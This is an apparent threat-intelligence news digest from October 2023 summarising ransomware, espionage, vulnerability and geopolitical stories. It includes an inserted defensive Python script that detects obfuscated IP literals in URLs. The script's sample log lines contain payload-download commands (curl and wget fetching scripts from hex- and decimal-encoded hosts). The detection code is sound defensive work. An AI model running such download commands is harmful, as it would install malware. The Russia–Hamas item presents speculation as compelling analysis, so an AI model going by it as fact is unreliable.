Daily Drop (622): Russia's Hidden Hand, Grassroots Drones, RISC-V CPU cores, CVE-2023-22515, Microsoft: IRS, Mirai Variant, Finland: Sabotage, Storm-1567, Starlink Evolution, China's Ministry of State Security Hacked, ToddyCat
10-12-23
Thursday, Oct 12, 2023 // (IG): BB // China's Ministry of State Security Hacked
Russia's Hidden Hand in the Hamas Attack on Israel
Bottom Line Up Front (BLUF): The recent attack on Israel by the terrorist group Hamas may have been influenced by Russia, with President Vladimir Putin benefiting from the ensuing chaos. The attack serves as a distraction from Russia's faltering military operations in Ukraine and its broader geopolitical ambitions.
Analyst Comments: The circumstantial evidence pointing towards Russia's involvement in the Hamas attack on Israel is compelling. Putin's strategy appears to be to divert attention from his failures in Ukraine and to create divisions within the U.S. and its allies. The Biden administration is now in a precarious position, having to manage multiple crises simultaneously. A decisive strategy focusing on Russia is essential. This involves not only supporting Israel's defense but also providing Ukraine with the necessary military aid to counter Russia's advances. The recent events underscore the need for a cohesive and robust foreign policy approach to address the multifaceted challenges posed by Russia.
FROM THE MEDIA: The sudden outbreak of war in Israel, instigated by Hamas, seems to have only one real beneficiary: Russian President Vladimir Putin. By supporting Iran, a known ally of Hamas, Putin has effectively opened a new front in his ongoing war against the West. This move aligns with Mitt Romney's 2012 assertion that Russia is a significant geopolitical foe. The current state of Russia, under Putin's leadership, is aggressively trying to re-establish its global dominance. Over the past 11 years, Russia has been involved in various destabilizing activities, from sowing disinformation to direct interventions in countries like Syria, Niger, and Sudan. The recent surprise attack on Israel by Hamas, termed Operation Al-Aqsa, was unprecedented in its scale and sophistication, leading to speculations of support from Iran and possibly Russia. Reports from The Washington Post and Wall Street Journal have confirmed Iran's involvement.
READ THE STORY: The Hill
Advanced Defense Mechanism Prevents Large-Scale Encryption Attempt by Storm-1567
Bottom Line Up Front (BLUF): Microsoft Defender for Endpoint successfully stopped a significant remote encryption attempt by Akira ransomware targeting an undisclosed industrial organization in June 2023. The campaign, attributed to the operator Storm-1567, utilized devices not onboarded to Microsoft Defender as a defense evasion strategy.
Analyst Comments: The Akira ransomware attack underscores the importance of advanced defense mechanisms in today's cybersecurity landscape. Microsoft Defender for Endpoint's ability to automatically disrupt attack chains showcases the evolution of endpoint protection tools. Organizations must continually update and refine their security measures to counteract the ever-evolving tactics and techniques of threat actors. The proactive containment of compromised accounts, especially those with high privileges, is crucial in preventing the escalation and spread of attacks within networks.
FROM THE MEDIA: In early June 2023, Akira ransomware actors initiated a large-scale attack on an unknown industrial entity. The attackers employed devices not integrated with Microsoft Defender for Endpoint, aiming to evade detection. Before attempting to encrypt devices using a compromised user account, the attackers conducted reconnaissance and lateral movement activities. Microsoft's new automatic attack disruption feature played a crucial role in thwarting the attack. This feature restricts breached accounts from accessing network endpoints and resources, effectively limiting the attackers' lateral movement capabilities, irrespective of the account's Active Directory status or privilege level.
READ THE STORY: THN
Ukraine's Grassroots Drone Revolution
Bottom Line Up Front (BLUF): Ukraine's rapid development of a domestic drone industry, in response to the Russian invasion and the subsequent Chinese drone export ban, highlights the nation's resilience and adaptability. These pop-up drone factories, producing combat drones, have become a cornerstone of Ukraine's asymmetric warfare strategy against Russia.
Analyst Comments: The emergence of Ukraine's grassroots drone industry is a testament to the nation's innovative spirit and determination to defend its sovereignty. The government's proactive support, combined with the entrepreneurial drive, has enabled Ukraine to counterbalance Russia's military might with cost-effective, innovative solutions. The rapid adaptation and growth of this industry not only provide Ukraine with a tactical advantage but also lay the foundation for a robust tech industry post-conflict. The continuous innovation in drone designs, like the "drone in a box" concept by Airlogix, indicates that Ukraine is not just looking to match its adversaries but is striving to stay a step ahead.
FROM THE MEDIA: Vitalii Kolesnichenko's Airlogix, a Ukrainian drone company, epitomizes the swift transformation of the nation's tech industry amidst the conflict. Initially focused on cargo drones, the company pivoted to combat drones post-invasion. The Chinese drone export ban in September further accelerated domestic drone production, with entrepreneurs stepping in to fill the void. The Ukrainian government, recognizing the potential of drones in the ongoing conflict, has provided significant support. Alex Bornyakov, Ukraine’s deputy minister of digital transformation, has been instrumental in systematizing the grassroots effort, easing regulations, and increasing profit ceilings for military contracts. This has spurred the growth of hundreds of drone companies across the country. Airlogix and other companies are continuously innovating, with designs for drones that can be quickly assembled on the front lines, enhancing Ukraine's combat capabilities.
READ THE STORY: The Record
SpaceX's Starlink Evolution: Direct-to-Cell and IoT Services on the Horizon
Bottom Line Up Front (BLUF): SpaceX's Starlink is gearing up to introduce a direct-to-cell service for text messaging in 2024, with plans to roll out voice, data, and IoT services by 2025. This move signifies Starlink's ambition to bridge connectivity gaps, especially in rural and remote areas, by partnering with global cellular providers.
Analyst Comments: SpaceX's Starlink is making strategic moves to position itself as a major player in the global connectivity landscape. By introducing direct-to-cell and IoT services, Starlink is not only expanding its service offerings but also addressing the connectivity challenges faced by remote and underserved regions. Collaborations with global cellular providers further underscore Starlink's commitment to creating a more interconnected world. As these services roll out, they have the potential to reshape the dynamics of satellite-based communication and connectivity.
FROM THE MEDIA: SpaceX has updated Starlink's website to highlight its upcoming direct-to-cell service. Elon Musk, SpaceX's Chief Engineer, had earlier indicated that Starlink would begin its beta service for direct-to-cell in collaboration with T-Mobile by the end of 2023. This partnership, announced last year, aims to enhance cellular network coverage in areas with limited connectivity, allowing T-Mobile users to send messages via Starlink satellites. In addition to T-Mobile, Starlink has forged partnerships with several global cellular providers, including Rogers (Canada), Optus (Australia), One NZ (New Zealand), KDDI (Japan), and Salt (Switzerland). Starlink is actively inviting other cellular providers to collaborate and leverage its service to expand their network reach. The satellites will utilize the partner spectrum to operate services within their respective countries.
READ THE STORY: Via Satellite
Asian Governments and Telecoms Under Cyber Siege
Bottom Line Up Front (BLUF): Prominent government and telecom sectors in Asia have been under cyberattack since 2021. The campaign, named "Stayin' Alive" by cybersecurity firm Check Point, employs rudimentary backdoors and loaders to introduce subsequent-stage malware. The campaign's infrastructure has similarities with ToddyCat, a China-linked threat actor.
Analyst Comments: The ongoing cyberattacks on Asian government and telecom entities highlight the evolving nature of cyber threats. The use of basic tools, which are frequently replaced and possibly built from scratch, indicates a shift in tactics by threat actors to evade detection. The potential link between the Stayin' Alive campaign and the China-linked ToddyCat group underscores the geopolitical implications of such cyber campaigns. Organizations need to be vigilant and adopt robust cybersecurity measures to defend against such sophisticated and evolving threats.
FROM THE MEDIA: The Stayin' Alive campaign has been targeting organizations in Vietnam, Uzbekistan, Pakistan, and Kazakhstan. The tools used in these attacks are simple and varied, suggesting their primary purpose is to download and run additional payloads. Interestingly, the infrastructure used in this campaign overlaps with that of ToddyCat, a known cyber adversary that has been targeting government and military agencies in Europe and Asia since December 2020. The attack chain typically begins with a spear-phishing email containing a ZIP file. This file has a legitimate executable that uses DLL side-loading to introduce a backdoor named CurKeep. This backdoor can send information about the compromised system to a remote server, execute commands from the server, and write server responses to a file on the system.
READ THE STORY: THN
Suspected Sabotage on Maritime Infrastructure Intensifies Concerns
Bottom Line Up Front (BLUF): The Finnish Security and Intelligence Service (Supo) has issued a warning about deteriorating relations with Russia, following a suspected sabotage act on Finland's maritime infrastructure. While no direct blame has been placed, there are suspicions of external involvement, with Russia being a potential culprit.
Analyst Comments: The maritime sabotage incident and Supo's subsequent warnings highlight the growing geopolitical tensions between Finland and Russia. Finland's recent decision to join NATO, following Russia's actions in Ukraine, marks a significant shift in regional dynamics. As cyber capabilities become increasingly central to nation-state strategies, countries must enhance their defenses against potential cyber threats. The incident serves as a reminder of the evolving nature of international conflicts, where physical and cyber realms are deeply intertwined.
FROM THE MEDIA: Supo's recent statements underscore the escalating tensions between Finland and Russia, especially in the wake of the sabotage incident that affected a subsea telecommunications cable and a gas pipeline connecting Finland and Estonia. Although no direct accusations have been made, Finland's President Sauli Niinistö's office has hinted at "external activity" being the cause. Local media, such as the tabloid Iltalehti, have cited sources pointing to Russia as the potential instigator. However, Prime Minister Petteri Orpo has called for a comprehensive investigation before drawing any conclusions. Supo's director, Antti Pelttari, emphasized that Russia's ongoing involvement in the Ukraine conflict and its attempts to reduce international isolation do not diminish the potential threats to Finland. The agency also highlighted the vulnerabilities in Finland's marine infrastructure. Suvi Alvari, a Supo researcher, indicated that Russia's current operations against Finland are primarily deterrence-focused, with the energy sector being a significant target.
READ THE STORY: The Record
The Silicon Valley-based firm unveils cores designed for high-performance tasks and AI/ML applications
Bottom Line Up Front (BLUF): SiFive has introduced two new RISC-V CPU cores, the Performance P870 and the X380, targeting high-performance and AI/ML applications. These cores represent a significant advancement in performance and AI workload acceleration, showcasing the potential of RISC-V in the evolving tech landscape.
Analyst Comments: SiFive's latest core designs highlight the company's commitment to pushing the boundaries of RISC-V technology. The significant performance improvements and focus on AI/ML applications indicate a strategic move to cater to the growing demands of the tech industry. The introduction of these cores also comes at a time when there are calls for export controls on semiconductors to China, which could have implications for the RISC-V ecosystem. SiFive's advancements in RISC-V technology, combined with the geopolitical landscape, make it a company to watch in the coming years.
FROM THE MEDIA: SiFive, a Silicon Valley-based company, has launched the Performance P870, a 64-bit out-of-order superscalar processor core that supports the open RISC-V instruction set. This core can run Linux, Android, and other compatible operating systems and boasts features like an IOMMU, hardware support for hypervisors, and SiFive's WorldGuard for code and data isolation. The P870 is designed for applications requiring high throughput and low power consumption, making it suitable for mobile, edge, data center, and automotive markets. Compared to its predecessor, the P670, the P870 offers a 50% performance boost. The core's design allows for SoC configurations of up to 32 cores using eight four-core clusters. The second core, the X380, is the successor to SiFive's X280 core and is specifically designed to accelerate large-vector instructions used in AI and machine learning.
READ THE STORY: The Register
A recently discovered Atlassian vulnerability is being exploited by hackers linked to the Chinese government
Bottom Line Up Front (BLUF): Microsoft has reported that hackers associated with the Chinese government are exploiting a new vulnerability in Atlassian's product. This vulnerability, identified as CVE-2023-22515, affects Atlassian’s Confluence Data Center and Server product and has been under attack since September 14.
Analyst Comments: The exploitation of the Atlassian vulnerability by hackers linked to the Chinese government underscores the persistent cybersecurity threats posed by nation-state actors. The rapid exploitation of newly discovered vulnerabilities highlights the need for organizations to stay updated on potential threats and to implement patches promptly. The association of these attacks with known entities affiliated with the Chinese government further emphasizes the geopolitical implications of cybersecurity in the current digital age.
FROM THE MEDIA: On Tuesday evening, Microsoft released a notice indicating that a nation-state actor has been exploiting the vulnerability in Atlassian's Confluence Data Center and Server product. Atlassian had previously issued an advisory and patch for this vulnerability on October 4 and updated it to confirm that a known nation-state actor was actively exploiting it. Atlassian has categorized the bug as "critical," its highest severity rating. Microsoft emphasized the gravity of the situation, stating that any device able to reach a vulnerable Confluence instance over the network can use this vulnerability to create a Confluence administrator account. It strongly advised Atlassian customers to update to the latest fixed version immediately and to isolate vulnerable Confluence applications from public internet access until they can be upgraded.
READ THE STORY: The Record
Microsoft Challenges IRS's $28.9 Billion Back Tax Bill
Bottom Line Up Front (BLUF): Microsoft has disclosed that the IRS sent them a bill for $28.9 billion in back taxes last month. The company has expressed its intention to challenge this charge.
Analyst Comments: The IRS's substantial back tax bill to Microsoft underscores the complexities and potential pitfalls of international tax practices, particularly transfer pricing. As global tech giants continue to navigate the intricate web of international tax regulations, such disputes between companies and tax authorities are likely to persist. The outcome of Microsoft's contestation could set a precedent for other tech companies facing similar challenges.
FROM THE MEDIA: In a recent SEC filing, Microsoft announced that the IRS issued it notices of proposed adjustments (NOPAs) for the tax years 2004-2013 on September 26. The primary issues highlighted in the NOPAs pertain to "intercompany transfer pricing." Transfer pricing involves setting prices for goods and services exchanged within an organization. The IRS defines it as prices charged between affiliates in an intercompany transaction involving the transfer of goods, services, or intangibles. This practice is legal, but when it results in revenue being shifted to low-tax jurisdictions, it can be deemed abusive. In 2020, ProPublica reported on Microsoft's transfer of assets to a small corporation in Puerto Rico, which offered the company an extremely low tax rate, described as "nearly zero percent." This move allegedly allowed Microsoft to avoid having around $39 billion in profits taxed at the rates that other jurisdictions impose.
READ THE STORY: The Register
Evolving Cyber Threats: ShellBot's New Evasion Tactics and the Rise of Malicious Certificates
Bottom Line Up Front (BLUF): ShellBot, a known threat, has adopted a new evasion technique by using IP addresses in hexadecimal notation to infiltrate Linux SSH servers. Concurrently, attackers are leveraging abnormal certificates with extended strings to distribute information-stealing malware, highlighting the evolving tactics cybercriminals employ to bypass detection.
Analyst Comments: The adoption of hexadecimal IP addresses by ShellBot and the use of abnormal certificates indicate the lengths to which cybercriminals are willing to go to evade detection. As cyber threats continue to evolve, it's crucial for cybersecurity professionals to stay updated on these tactics and adapt their defense mechanisms accordingly. The continuous evolution of these threats underscores the importance of robust cybersecurity measures, regular system updates, and user education.
FROM THE MEDIA: ShellBot, traditionally known for breaching servers with weak SSH credentials, has now been observed using hexadecimal IP addresses to download its malware, a move seen as an attempt to evade URL-based detection mechanisms. This malware, developed in Perl, communicates with its command-and-control (C2) server via the IRC protocol. The AhnLab Security Emergency Response Center (ASEC) highlighted this change in tactics, noting that the malware can still be downloaded and executed on Linux systems because curl accepts IP addresses written in hexadecimal notation.
READ THE STORY: THN
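A defender-side illustration of the ShellBot item above, added here and not taken from the ASEC report or the digest: a small normaliser that extracts URLs from constructed log lines, converts inet_aton-style IPv4 literals (hexadecimal, plain 32-bit decimal, octal, and short dotted forms, which is the family of notations curl's resolver accepts; that equivalence to BSD inet_aton is an assumption) to a canonical dotted quad, and flags any URL whose host was not written as a plain dotted quad. The log lines and addresses are constructed samples.

```python
"""Flag URLs whose IPv4 host is written in a non-dotted-decimal notation.

Blocklists and URL-string detections that only know 192.168.1.1 miss
http://0xC0A80101/, http://3232235777/ and http://0300.0250.01.01/, even
though all four resolve to the same host. Normalising the literal first
lets a detection compare against the canonical form.
"""
import re
from typing import List, Optional, Tuple

# Host group stops at '/', ':', whitespace or a quote; port and path are optional.
URL_RE = re.compile(r'https?://([^/\s:"]+)(?::\d+)?(?:/\S*)?')
# One inet_aton component: 0x.. hex or a run of digits (octal if leading 0).
PART_RE = re.compile(r"0[xX][0-9a-fA-F]+|\d+")

# Constructed sample log lines (hypothetical hosts and paths, not real IoCs).
SAMPLE_LOG_LINES = [
    '2023-10-11T02:14:07Z host=web01 cmd="curl -fsSL http://0xC0A80101/dl.pl -o /tmp/.x"',
    '2023-10-11T02:14:09Z host=web01 cmd="wget http://3232235777/bin.sh"',
    '2023-10-11T02:15:30Z host=web02 cmd="curl http://0300.0250.01.01:8080/p"',
    '2023-10-11T02:16:02Z host=web02 cmd="curl https://packages.example.com/update"',
    '2023-10-11T02:16:45Z host=web03 cmd="curl http://192.168.1.1/health"',
]


def _parse_part(part: str) -> int:
    """Parse one component the way inet_aton does: 0x.. hex, 0.. octal, else decimal."""
    if part.lower().startswith("0x"):
        return int(part[2:], 16)
    if len(part) > 1 and part.startswith("0"):
        return int(part, 8)
    return int(part, 10)


def normalize_ip_literal(host: str) -> Optional[str]:
    """Return the dotted-quad form of an inet_aton-style IPv4 literal, or None
    if ``host`` is not such a literal (for example a DNS name).

    Assumed semantics (BSD inet_aton): with 1 part the value fills 32 bits,
    with 2 parts the last fills 24 bits, with 3 parts the last fills 16 bits,
    and with 4 parts every component is one byte.
    """
    parts = host.split(".")
    if not 1 <= len(parts) <= 4 or not all(PART_RE.fullmatch(p) for p in parts):
        return None
    try:
        values = [_parse_part(p) for p in parts]
    except ValueError:  # e.g. "09" is not valid octal
        return None
    tail_bits = 8 * (5 - len(parts))  # bits filled by the last component
    if any(v > 0xFF for v in values[:-1]) or values[-1] >= (1 << tail_bits):
        return None
    addr = 0
    for v in values[:-1]:
        addr = (addr << 8) | v
    addr = (addr << tail_bits) | values[-1]
    return ".".join(str((addr >> shift) & 0xFF) for shift in (24, 16, 8, 0))


def find_obfuscated_ip_urls(log_lines: List[str]) -> List[Tuple[str, str, str]]:
    """Return (line, host_as_written, canonical_ip) for every URL whose host is
    an IPv4 literal written in anything other than plain dotted-decimal."""
    hits = []
    for line in log_lines:
        for m in URL_RE.finditer(line):
            host = m.group(1)
            canonical = normalize_ip_literal(host)
            # A plain dotted quad normalises to itself; anything else is unusual.
            if canonical is not None and canonical != host:
                hits.append((line, host, canonical))
    return hits


if __name__ == "__main__":
    for line, host, canonical in find_obfuscated_ip_urls(SAMPLE_LOG_LINES):
        print(f"non-standard IP literal {host!r} -> {canonical}: {line}")
```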
UK's Satellite Vu Achieves Milestone with High-Resolution Thermal Imagery from HOTSAT-1
Bottom Line Up Front (BLUF): Satellite Vu, a London-based thermal infrared satellite firm, has successfully received high-resolution thermal imagery from its recently launched satellite, HOTSAT-1. This achievement marks a significant step in the company's transition to commercial operations, with HOTSAT-1 being the pioneer of a planned eight-satellite constellation.
Analyst Comments: Satellite Vu's HOTSAT-1 represents a significant leap in the realm of satellite thermal imaging. The satellite's capabilities, combined with Satellite Vu's vision and partnerships, position the company at the forefront of thermal infrared satellite operations. As the company progresses with its plans for a satellite constellation, it is poised to play a transformative role in diverse sectors, from environmental monitoring to logistics optimization. The advancements made by Satellite Vu underscore the growing significance of space technology in addressing global challenges and shaping a sustainable future.
FROM THE MEDIA: Satellite Vu's HOTSAT-1, designed and manufactured in the UK in collaboration with Surrey Satellite Technologies, boasts a 3.5m resolution mid-wave infrared imager with video capability, ensuring a sensitivity of less than 2 degrees Celsius. The satellite is the first in a series of eight that the company plans to launch. The company, which aspires to be recognized as 'The World’s Thermometer', has highlighted the significance of this "first light imagery" as a pivotal moment in its journey towards commercial operations. Anthony Baker, CEO and Co-founder of Satellite Vu, emphasized the company's dedication to harnessing advanced technology for the planet's betterment. He highlighted HOTSAT-1's capability to capture invaluable thermal imagery, which can be applied in diverse areas ranging from logistics optimization and environmental planning to energy-related decision-making.
READ THE STORY: Electronics Weekly
Mirai Botnet Variant Targets Routers and IoT Devices
Bottom Line Up Front (BLUF): A Mirai-based malware botnet variant, IZ1H9, has been observed aggressively targeting routers and other internet-connected devices, potentially amassing a vast botnet capable of launching potent DDoS attacks.
Analyst Comments: The aggressive targeting of routers and IoT devices by the IZ1H9 variant of the Mirai botnet underscores the evolving threat landscape of cyberattacks. As botnets continue to adapt and exploit new vulnerabilities, there is a heightened need for robust cybersecurity measures and timely patching of known vulnerabilities to prevent large-scale DDoS attacks and protect critical online infrastructure.
FROM THE MEDIA: Researchers at Fortinet have discovered that the IZ1H9 variant of the Mirai-based malware botnet has expanded its payload arsenal to target routers and other internet-facing devices. This variant was found exploiting vulnerabilities in products from nine brands: D-Link, Netis, Sunhillo, Geutebruck, Yealink, Zyxel, TP-Link, Korenix, and TOTOLINK. The peak exploitation of these vulnerabilities was believed to have occurred on September 6. IZ1H9 was first identified in August 2018, two years after the original Mirai botnet was seen infecting Linux-based devices. The original Mirai has been linked to some of the most disruptive distributed denial-of-service (DDoS) attacks, including a notable 2016 attack that affected major websites like Twitter, Reddit, and Netflix.
READ THE STORY: The Record
Stealth Malware Disguised as WordPress Plugin Uncovered
Bottom Line Up Front (BLUF): Cybersecurity experts have identified a sophisticated malware strain masquerading as a WordPress caching plugin. This malware covertly establishes administrator accounts, granting attackers remote control over compromised websites.
Analyst Comments: The discovery of this malware highlights the escalating threats targeting popular platforms like WordPress. The malware's ability to remotely control and monetize a victim site poses significant risks to website administrators, potentially harming SEO rankings, user privacy, and overall site integrity. It's crucial for website owners and administrators to exercise caution, ensuring they only install trusted plugins and regularly update and patch their systems. The increasing sophistication of such threats underscores the need for continuous vigilance and proactive cybersecurity measures.
FROM THE MEDIA: Researchers have unveiled a malware strain that poses as a professional-looking WordPress plugin, suggesting it's a caching tool. However, it's packed with malicious functions, including the ability to remotely control plugins, create rogue admin accounts, and manipulate content. The malware can also redirect search engine crawlers to index suspicious content, leading site visitors to questionable destinations. In September 2023, over 17,000 WordPress sites were compromised with a similar malware, emphasizing the growing threat to WordPress platforms.
READ THE STORY: THN
Items of interest
Wagner Group's Activities Highlight the Complex Landscape of PMCs
Bottom Line Up Front (BLUF): Private Military Companies (PMCs), while often associated with negative impacts on global stability and human rights, are not universally detrimental. When structured with accountability and aligned with international law, PMCs can offer states significant benefits. However, the Wagner group's recent activities underscore the potential risks of PMCs closely aligned with authoritarian governments.
Analyst Comments: The global landscape of PMCs is diverse, with companies ranging from those closely tied to authoritarian regimes to those operating independently and emphasizing accountability. Governments seeking the services of PMCs must exercise due diligence, ensuring that they engage with firms that prioritize transparency, accountability, and adherence to international law. The Wagner group's activities serve as a cautionary tale, highlighting the potential risks of PMCs that operate as extensions of authoritarian states. However, with proper oversight and stringent hiring processes, PMCs can be valuable assets to states, enhancing their capabilities without compromising global stability or human rights.
FROM THE MEDIA: The Wagner group's increasing involvement in Africa and a failed mutiny attempt in Russia have reignited concerns about PMCs. Historically, the industry has been criticized for its potential to destabilize regions and violate human rights. However, PMCs, also known as private military and security companies (PMSCs), offer a broad spectrum of services, from logistical support to cyber defense. While Wagner's close ties with the Russian state are concerning, it's an anomaly in the industry. Most PMCs, especially those from democracies, operate as independent entities. These firms, when transparent and accountable, can align with international humanitarian laws and offer states valuable services without compromising human rights or global stability.
READ THE STORY: AIIA
Asymmetric Warfare: Taiwan's New Underwater Drone (Video)
FROM THE MEDIA: Taiwan has unveiled its new underwater drone designed for asymmetric warfare against China. The Seawolf 400 submersible can be used for reconnaissance, search and rescue, and kamikaze attacks against enemy ships.
Unmanned Underwater Vehicles - The Future of Submarines (Video)
FROM THE MEDIA: Unmanned Underwater Vehicles (UUVs) are rapidly emerging as game-changers in naval warfare, offering enhanced capabilities, stealth, and flexibility. As technology continues to advance, UUVs are poised to play a pivotal role in future submarine operations and strategies.
These open-source products are reviewed by analysts at InfoDom Securities, providing possible context about current media trends related to the realm of cyber security. The stories selected cover a broad array of cyber threats and are intended to aid readers in framing key publicly discussed threats and overall situational awareness. InfoDom Securities does not endorse any third-party claims made in their original material or related links on their sites; the opinions expressed by third parties are theirs alone. For further questions, please contact InfoDom Securities at dominanceinformation@gmail.com.